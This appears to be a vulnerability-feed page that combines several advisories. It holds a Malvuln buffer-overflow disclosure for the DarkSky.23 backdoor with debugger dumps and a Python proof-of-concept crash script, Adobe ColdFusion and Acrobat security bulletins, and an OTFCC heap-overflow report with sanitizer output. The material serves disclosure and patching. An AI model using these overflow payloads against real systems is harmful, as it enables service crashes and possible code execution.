0019D24C  56 54 45 31 3E 50 50 50 50 50 41 41 41 41 41 41  VTE1>PPPPPAAAAAA    
0019D25C  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA    
0019D26C  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA    
0019D27C  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA    
0019D28C  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA  

So to get our \x41 pattern we need to supply \x50, the malware will XOR it with 0x11 giving us \x41.

>>> 0x50 ^ 0x11  
65  
>>> hex(65)  
'0x41'  
>>> chr(65)  
'A'

EAX : 7EFEFEFE  
EBX : 02902A58  
ECX : 0019F4B0  
EDX : 41414141  
EBP : 0019D230  
ESP : 0019D214  
ESI : 0019D777  
EDI : 0019FF81  
EIP : 7451561B     msvcrt.7451561B

Finally we see our desired exploit payload converted from \x50 'P' to \x41 or "A" 

0019D240  08 DF 8E 02 08 DF 8E 02 01 00 00 00 56 54 45 31  .ß...ß......VTE1    
0019D250  3E 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  >AAAAAAAAAAAAAAA    
0019D260  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA    
0019D270  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA    
0019D280  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50  AAAAAAAAAAAAAAAP    
0019D290  50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50  PPPPPPPPPPPPPPPP    
0019D2A0  50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50  PPPPPPPPPPPPPPPP

Memory Dump:  
(2798.242c): Stack buffer overflow - code c0000409 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=0019f52c edx=41414141 esi=00000000 edi=00000002  
eip=7770ed3c esp=0019cb60 ebp=0019cba0 iopl=0         nv up ei pl nz ac pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000216  
ntdll!ZwWaitForMultipleObjects+0xc:  
7770ed3c c21400          ret     14h

0:000> .ecxr  
eax=7efefefe ebx=02552c88 ecx=0019f52c edx=41414141 esi=0019d777 edi=0019fffd  
eip=74515619 esp=0019d214 ebp=0019d230 iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
msvcrt!strcat+0x89:  
74515619 8917            mov     dword ptr [edi],edx  ds:002b:0019fffd=41000000  
*** WARNING: Unable to verify checksum for SysArchive.exe  
*** ERROR: Module load completed but symbols could not be loaded for SysArchive.exe

0:000> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

Failed calling InternetOpenUrl, GLE=12029

FAULTING_IP:   
msvcrt!strcat+89  
74515619 8917            mov     dword ptr [edi],edx

EXCEPTION_RECORD:  0019cd64 -- (.exr 0x19cd64)  
ExceptionAddress: 74515619 (msvcrt!strcat+0x00000089)  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000008  
NumberParameters: 2  
   Parameter[0]: 00000001  
   Parameter[1]: 001a0000  
Attempt to write to address 001a0000

PROCESS_NAME:  SysArchive.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1:  00000015

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  70

APPLICATION_VERIFIER_FLAGS:  0

CHKIMG_EXTENSION: !chkimg -lo 50 -d !msvcrt  
    74515590 - msvcrt!strcat  
  [ 8b:cc ]  
    74515617 - msvcrt!strcat+87 (+0x87)  
  [ eb:cc ]  
2 errors : !msvcrt (74515590-74515617)

CONTEXT:  0019cdb4 -- (.cxr 0x19cdb4)  
eax=7efefefe ebx=02552c88 ecx=0019f52c edx=41414141 esi=0019d777 edi=0019fffd  
eip=74515619 esp=0019d214 ebp=0019d230 iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
msvcrt!strcat+0x89:  
74515619 8917            mov     dword ptr [edi],edx  ds:002b:0019fffd=41000000  
Resetting default scope

WRITE_ADDRESS:  001a0000 

FOLLOWUP_IP:   
msvcrt!strcat+89  
74515619 8917            mov     dword ptr [edi],edx

FAULTING_THREAD:  0000242c

BUGCHECK_STR:  APPLICATION_FAULT_MEMORY_CORRUPTION_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_LARGE_EXPLOITABLE_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS:  MEMORY_CORRUPTION_LARGE_EXPLOITABLE_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID:  MEMORY_CORRUPTION_LARGE_EXPLOITABLE_FILL_PATTERN_41414141

LAST_CONTROL_TRANSFER:  from 00404ed7 to 74515619

STACK_TEXT:    
0019d214 00404ed7 0019e24c 0019d777 0019d238 msvcrt!strcat+0x89  
WARNING: Stack unwind information not available. Following frames may be wrong.  
0019d230 00402394 00004128 0019e24c 04ed39f8 SysArchive+0x4ed7  
0019f9e8 41414141 41414141 41414141 41414141 SysArchive+0x2394  
0019f9ec 41414141 41414141 41414141 41414141 0x41414141  
0019f9f0 41414141 41414141 41414141 41414141 0x41414141  
0019f9f4 41414141 41414141 41414141 41414141 0x41414141  
0019f9f8 41414141 41414141 41414141 41414141 0x41414141  
0019f9fc 41414141 41414141 41414141 41414141 0x41414141  
0019fa00 41414141 41414141 41414141 41414141 0x41414141  
0019fa04 41414141 41414141 41414141 41414141 0x41414141  
0019fa08 41414141 41414141 41414141 41414141 0x41414141  
0019fa0c 41414141 41414141 41414141 41414141 0x41414141  
0019fa10 41414141 41414141 41414141 41414141 0x41414141  
0019fa14 41414141 41414141 41414141 41414141 0x41414141  
0019fa18 41414141 41414141 41414141 41414141 0x41414141  
0019fa1c 41414141 41414141 41414141 41414141 0x41414141  
0019fa20 41414141 41414141 41414141 41414141 0x41414141  
0019fa24 41414141 41414141 41414141 41414141 0x41414141  
0019fa28 41414141 41414141 41414141 41414141 0x41414141  
0019fa2c 41414141 41414141 41414141 41414141 0x41414141  
0019fa30 41414141 41414141 41414141 41414141 0x41414141  
...

SYMBOL_NAME:  memory_corruption!msvcrt

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: memory_corruption

IMAGE_NAME:  memory_corruption

DEBUG_FLR_IMAGE_TIMESTAMP:  0

STACK_COMMAND:  dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; .cxr 0x19cdb4 ; kb

FAILURE_BUCKET_ID:  MEMORY_CORRUPTION_LARGE_EXPLOITABLE_FILL_PATTERN_41414141_c0000409_memory_corruption!msvcrt

BUCKET_ID:  APPLICATION_FAULT_MEMORY_CORRUPTION_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_LARGE_EXPLOITABLE_FILL_PATTERN_41414141_MISSING_GSFRAME_memory_corruption!msvcrt

0:000> !exchain  
0019cc18: ntdll!_except_handler4+0 (77716a50)  
  CRT scope  0, func:   ntdll!RtlReportExceptionHelper+251 (777557ad)  
0019f9dc: 41414141  
Invalid exception stack at 41414141

Exploit/PoC:  
from socket import *

MALWARE_HOST="x.x.x.x"  
PORT=5418

def doit():  
    s=socket(AF_INET, SOCK_STREAM)  
    s.connect((MALWARE_HOST, PORT))

    JUNK="GET /"+"\x50"*1300+"HTTP/1.1\r\nHost:29"+"\x50"*10000  
    PAYLOAD=JUNK+"\r\n\r\n"

    s.send(PAYLOAD)  
    s.close()  
    print("Backdoor DarkSky.23 Exploit By malvuln")

if __name__=="__main__":  
    doit()

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.DarkSky.23 MVID-2022-0648 Buffer Overflow

A vulnerability classified as critical was found in X.org Server. Affected by this vulnerability is the function _GetCountedString of the file xkb/xkb.c. The manipulation leads to buffer overflow. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211051.

CVE-2022-3550

Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction, the vulnerability is triggered when a crafted network packet is sent to the server.

Security updates available for Adobe ColdFusion | APSB22-44

Adobe has released security updates for ColdFusion versions 2021 and 2018. These updates resolve Critical, Important and Moderate  vulnerabilities that could lead to arbitrary code execution, arbitrary file system write, security feature bypass and privilege escalation.

Adobe categorizes these updates with the following priority rating and recommends users update their installations to the newest versions:

Adobe recommends updating your ColdFusion JDK/JRE to the latest version of the LTS releases for JDK 11. Applying the ColdFusion update without a corresponding JDK update will NOT secure the server.  See the relevant Tech Notes for more details. 

Adobe  also recommends customers apply the security configuration settings as outlined on the ColdFusion Security page as well as review the respective Lockdown guides.    

*   ColdFusion 2018 Auto-Lockdown guide   
*   ColdFusion 2021 Lockdown Guide

Adobe would like to thank the following for reporting the relevant issues and for working with Adobe to help protect our customers:

*   rgod working with Trend Micro Zero Day Initiative - CVE-2022-35710, CVE-2022-35711, CVE-2022-35690, CVE-2022-35712, CVE-2022-38418, CVE-2022-38419, CVE-2022-38420, CVE-2022-38421, CVE-2022-38422, CVE-2022-38423, CVE-2022-38424
*   reillyb - CVE-2022-42340, CVE-2022-42341

**ColdFusion JDK Requirement**

**COLDFUSION 2021 (version 2021.0.0.323925) and above**

**For Application Servers**   

On JEE installations, set the following JVM flag, "-Djdk.serialFilter= !org.mozilla.\*\*;!com.sun.syndication.\*\*;!org.apache.commons.beanutils.\*\*", in the respective startup file depending on the type of Application Server being used.   

For example:   

Apache Tomcat Application Server: edit JAVA\_OPTS in the ‘Catalina.bat/sh’ file   

WebLogic Application Server:  edit JAVA\_OPTIONS in the ‘startWeblogic.cmd’ file   

WildFly/EAP Application Server:  edit JAVA\_OPTS in the ‘standalone.conf’ file   

Set the JVM flags on a JEE installation of ColdFusion, not on a standalone installation.   

**COLDFUSION 2018 HF1 and above**  

**For Application Servers**   

On JEE installations, set the following JVM flag, "-Djdk.serialFilter= !org.mozilla.\*\*;!com.sun.syndication.\*\*;!org.apache.commons.beanutils.\*\*", in the respective startup file depending on the type of Application Server being used.   

For example:   

Apache Tomcat Application Server: edit JAVA\_OPTS in the ‘Catalina.bat/sh’ file   

WebLogic Application Server:  edit JAVA\_OPTIONS in the ‘startWeblogic.cmd’ file   

WildFly/EAP Application Server:  edit JAVA\_OPTS in the ‘standalone.conf’ file   

Set the JVM flags on a JEE installation of ColdFusion, not on a standalone installation.   

For more information, visit https://helpx.adobe.com/security.html , or email PSIRT@adobe.com

CVE-2022-35690: Adobe Security Bulletin

Adobe Acrobat Reader versions 22.002.20212 (and earlier) and 20.005.30381 (and earlier) are affected by a NULL Pointer Dereference vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security update available for Adobe Acrobat and Reader  | APSB22-46

**Bulletin ID**

**Date Published**

**Priority**

APSB22-46

October 11, 2022

3

**Summary**

Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address critical and important vulnerabilities. Successful exploitation could lead to application denial-of-service and memory leak.                    

**Affected Versions**

**Product**

**Track**

**Affected Versions**

**Platform**

Acrobat DC 

Continuous 

22.002.20212 and earlier versions

Windows &  macOS

Acrobat Reader DC

Continuous 

22.002.20212 and earlier versions  

Windows & macOS

Acrobat 2020  

Classic 2020             

20.005.30381 and earlier versions

Windows & macOS  

Acrobat Reader 2020  

Classic 2020             

20.005.30381 and earlier versions  

Windows & macOS  

For questions regarding Acrobat DC, please visit the Acrobat DC FAQ page. 

**Solution**

Adobe recommends users update their software installations to the latest versions by following the instructions below.    

The latest product versions are available to end users via one of the following methods:    

*   Users can update their product installations manually by choosing Help > Check for Updates.     
    
*   The products will update automatically, without requiring user intervention, when updates are detected.      
    
*   The full Acrobat Reader installer can be downloaded from the Acrobat Reader Download Center.     
    

For IT administrators (managed environments):     

*   Refer to the specific release note version for links to installers.     
    
*   Install updates via your preferred methodology, such as AIP-GPO, bootstrapper, SCUP/SCCM (Windows), or on macOS, Apple Remote Desktop and SSH.     
    

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version:    

**Product**

**Track**

**Updated Versions**

**Platform**

**Priority Rating**

**Availability**

Acrobat DC

Continuous

22.003.20258  

Windows and macOS

3

Release Notes     

Acrobat Reader DC

Continuous

22.003.20258  

Windows and macOS

3

Release Notes     

Acrobat 2020  

Classic 2020             

20.005.30407

Windows  and macOS    

3

Release Notes     

Acrobat Reader 2020  

Classic 2020   

20.005.30407  

Windows  and macOS   

3

Release Notes   

**Vulnerability Details**

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVSS base score**

CVSS vector

**CVE Number**

NULL Pointer Dereference (CWE-476)  

Application denial-of-service  

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H  

CVE-2022-35691  

Use After Free (CWE-416)  

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-38437  

Stack-based Buffer Overflow (CWE-121)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

  
CVE-2022-38450  

Stack-based Buffer Overflow (CWE-121)  

Arbitrary code execution  

Critical  

7.8  

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-42339  

Out-of-bounds Read (CWE-125)  

Memory leak  

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-38449  

Out-of-bounds Read (CWE-125)  

Memory leak  

Important  

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-42342  

**Acknowledgements**

Adobe would like to thank the following for reporting these issues and for working with Adobe to help protect our customers:   

*   Suyue Guo and Wei You from Renmin University of China (ruc\_se\_sec) - CVE-2022-35691  
    
*   Gil Mansharov (gilmansharov) - CVE-2022-38437
*   Rocco Calvi (@TecR0c) working with Trend Micro Zero Day Initiative - CVE-2022-42342  
    
*   soiax working with Trend Micro Zero Day Initiative - CVE-2022-38449
*   Zhiyuan Wang、Li shuang and willJ of vulnerability research institute - CVE-2022-42339,   
    CVE-2022-38450

**Revisions:**

July 26, 2022: Added CVE details for CVE-2022-35669

May 9th, 2022: Added CVE details for CVE-2022-28837, CVE-2022-28838

April 18, 2022: Updated acknowledgement for CVE-2022-24102, CVE-2022-24103, CVE-2022-24104  

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

CVE-2022-35691: Adobe Security Bulletin

OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6c0414.

**Product Link**

https://github.com/caryll/otfcc

**POC file**

https://github.com/Cvjark/Poc/files/9059919/id110\_heap\_buffer\_overflow\_sample\_otfccdump%2B0x6c0414.zip

**Command to reproduce**

./otfccbuild --pretty [sample file] -o /dev/null

**Product name & version**

last github commit code : 617837b

**Problem Type**

heap-buffer-overflow

**Crash Detail**

    ==102472==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fa28a7e5808 at pc 0x0000006c0415 bp 0x7ffe8b844290 sp 0x7ffe8b844288
    READ of size 8 at 0x7fa28a7e5808 thread T0
        #0 0x6c0414  (/home/bupt/Desktop/otfcc/bin/release-x64/otfccdump+0x6c0414)
        #1 0x527687  (/home/bupt/Desktop/otfcc/bin/release-x64/otfccdump+0x527687)
        #2 0x4fe3fe  (/home/bupt/Desktop/otfcc/bin/release-x64/otfccdump+0x4fe3fe)
        #3 0x4f5710  (/home/bupt/Desktop/otfcc/bin/release-x64/otfccdump+0x4f5710)
        #4 0x7fa28e8f7c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
        #5 0x41c549  (/home/bupt/Desktop/otfcc/bin/release-x64/otfccdump+0x41c549)
    
    0x7fa28a7e5808 is located 8 bytes to the right of 1048576-byte region [0x7fa28a6e5800,0x7fa28a7e5800)
    allocated by thread T0 here:
        #0 0x4aecd8 in calloc (/home/bupt/Desktop/otfcc/bin/release-x64/otfccdump+0x4aecd8)
        #1 0x526fd2  (/home/bupt/Desktop/otfcc/bin/release-x64/otfccdump+0x526fd2)
        #2 0x4fe3fe  (/home/bupt/Desktop/otfcc/bin/release-x64/otfccdump+0x4fe3fe)
        #3 0x4f5710  (/home/bupt/Desktop/otfcc/bin/release-x64/otfccdump+0x4f5710)
        #4 0x7fa28e8f7c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/bupt/Desktop/otfcc/bin/release-x64/otfccdump+0x6c0414) 
    Shadow bytes around the buggy address:
      0x0ff4d14f4ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0ff4d14f4ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0ff4d14f4ad0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0ff4d14f4ae0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0ff4d14f4af0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0ff4d14f4b00: fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0ff4d14f4b10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0ff4d14f4b20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0ff4d14f4b30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0ff4d14f4b40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0ff4d14f4b50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==102472==ABORTING
    

**Crash summary**

    SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/bupt/Desktop/otfcc/bin/release-x64/otfccdump+0x6c0414)

Tag

#buffer_overflow